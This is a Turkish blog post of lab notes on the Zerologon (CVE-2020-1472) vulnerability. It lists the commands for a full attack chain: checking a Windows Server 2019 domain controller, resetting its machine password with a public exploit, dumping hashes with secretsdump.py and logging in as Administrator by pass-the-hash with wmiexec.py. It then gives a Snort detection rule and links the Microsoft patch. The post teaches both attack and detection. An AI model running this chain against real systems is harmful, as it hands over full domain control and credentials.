Microsoft Zerologon CVE-2020-1472 Zaafiyeti Notlarım

Merhabalar;

Zerologon zaafiyeti barındıran Micrsosft sistemleri üzerinde siber saldırganlar çok kolay bir şekilde domain admin yetkilerini ele geçirebilmektedir. İgili zaafiyet hakkındaki white paper’a https://www.secura.com/pathtoimg.php?id=2055 adresinden ulaşılabilir ve bu zaafiyet hakkında detaylı teknik bilgi edilinebilir.

Bu yazımda;

  • Microsoft Server 2019 üzerinde bulunan CVE-2020-1472 Zerologon zaafiyetini nasıl exploit edebileceğimizden ve bu zaafiyeti önlemek için ne gibi güvenlik önlemleri alabileceğimizden bahsediyor olacağım.
  • Lab ortamımda 10.1.10.100 ip adresleri Kali Attacker makinesi üzerinden, 10.1.10.101 ip adresli Windows Server 2019 üzerinde yüklü olan dc.test domain controllarına atak yapacağım ve bu atağı arada tap mode’da dinlediğim Secuirty Onion üzerinde çalışan Snort IDS’e https://rules.emergingthreats.net/open/snort-2.9.0/emerging-all.rules adresinde paylaşılan atak imzasını girerek , ağımız içerisinde gerçekleştirilen bu atağı nasıl tespit edebileceğimizi göstereceğim.

Siber saldırganların bu zaafiyeti exploit etmesi için hedef domain controller’ın  hostname’ini ve ip adresini bilmesi yeterli olmaktadır.

Hedef Üzerinde CVE-2020-1472 Mevcut mu ?

Hedef domain controller üzerinde ilgili zaafiyetin olup olmadığını kontrol etmek için https://github.com/SecuraBV/CVE-2020-1472 adresinde paylaşılan scripti kullanabiliriz. Attacker kali makinemiz üzerine ilgili scripti git ile download ediyoruz.

root@kali:~# git clone https://github.com/SecuraBV/CVE-2020-1472.git

İndirdiğimizi dizine girip scriptin çalışması için gerekli olan bağımlılıkları kuralım.

root@kali:~/CVE-2020-1472# pip install -r requirements.txt

Artık dctest hostname’ine sahip olan, 10.1.10.101 ip adresi üzerinde çalışan domain controlller üzerinde bu zaafiyetin olup olmadığını kontrol edebiliriz.

root@kali:~/CVE-2020-1472# python3 zerologon_tester.py dctest 10.1.10.101

Sonuçtandan görüleceği üzere hedef sistemin zaafiyetli olduğu anlaşılmaktadır.

POC CVE-2020-1472

Şimdi hedefi exploitation adımına geçelim. Hedef’i exploit etmek için ihtiyacımız olan tool’lar;

Zerologon exploitini download edip, requiremets’leri kuralım.

root@kali:~# git clone https://github.com/risksense/zerologon.git
root@kali:~/zerologon# pip install -r requirements.txt

Exploiti çalıştıralım.

root@kali:~/zerologon# python3 set_empty_pw.py dctest 10.1.10.101

Artık secretsdump.py ile hedef üzerindeki password hash’lerini okuyabiliriz.

root@kali:~/impacket/examples# python3 secretsdump.py -just-dc dc.test/dctest\$@10.1.10.101

Son olarak hedefe domain admin olarak girmek için yapmamız gereken şey wmiexec.py tool’una elde ettiğimiz Administrator hash’ini vermemiz yeterlidir.

root@kali:~/impacket/examples# python3 wmiexec.py dc/Administrator@10.1.10.101 -hashes aad3b435b51404eeaad3b435b51404ee:efd3a974cc31d14e1662fc326f46b896

Zerologon Atağını Snort İmzası ile Tespit Etmek

Aşağıda paylaştığım snort imzasını , Security Onion üzerinde /etc/nsm/rules/ dizininde bulunan local.rules dosyasına yazalım ve SO üzerinde kuralların update edelim.

alert tcp any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Possible Zerologon NetrServerReqChallenge with 0x00 Client Challenge (CVE-2020-1472)"; flow:established,to_server; content:"|00|"; offset:2; content:"|04 00|"; distance:19; within:2; content:"|5c 00 5c 00|"; distance:0; within:50; content:"|00 00 00 00 00 00 00 00|"; isdataat:!1,relative; fast_pattern; threshold: type limit, count 5, seconds 30, track by_src; reference:url,www.secura.com/blog/zero-logon; reference:cve,2020-1472; classtype:attempted-admin; sid:2030870; rev:2; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Server, created_at 2020_09_14, cve CVE_2020_1472, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, updated_at 2020_09_18;)

anuman@anuman-virtual-machine:~$ sudo rule-update

Şimdi SO üzerinde snort zerologon atağı imzasını girdikten sonra, kali üzerinden tekrar atağımızı gerçekleştirelim ve SO üzerinde oluşan atak alertini Squert ile kontrol edelim.

Kali üzerinde tekrar atak:

root@kali:~/zerologon# python3 set_empty_pw.py dctest 10.1.10.101

Snort üzerinde oluşan alert:

Zerologon için Micrososft’un Yayınladığı Security Update’i

Zerologon zaafiyeti bulunan domain kontroller’ımız üzerinde Microsoft’un https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472 adresinde  yayınladığı update’leri vakit kaybetmeden geçmemiz gerekir.

Çeşitli Güvenlik Üreticilerinin CVE-2020-1472 İmzaları

Eğer bilişim alt yapımızda ;

 

İlk yorum yapan olun

Bir yanıt bırakın

E-posta hesabınız yayımlanmayacak.


*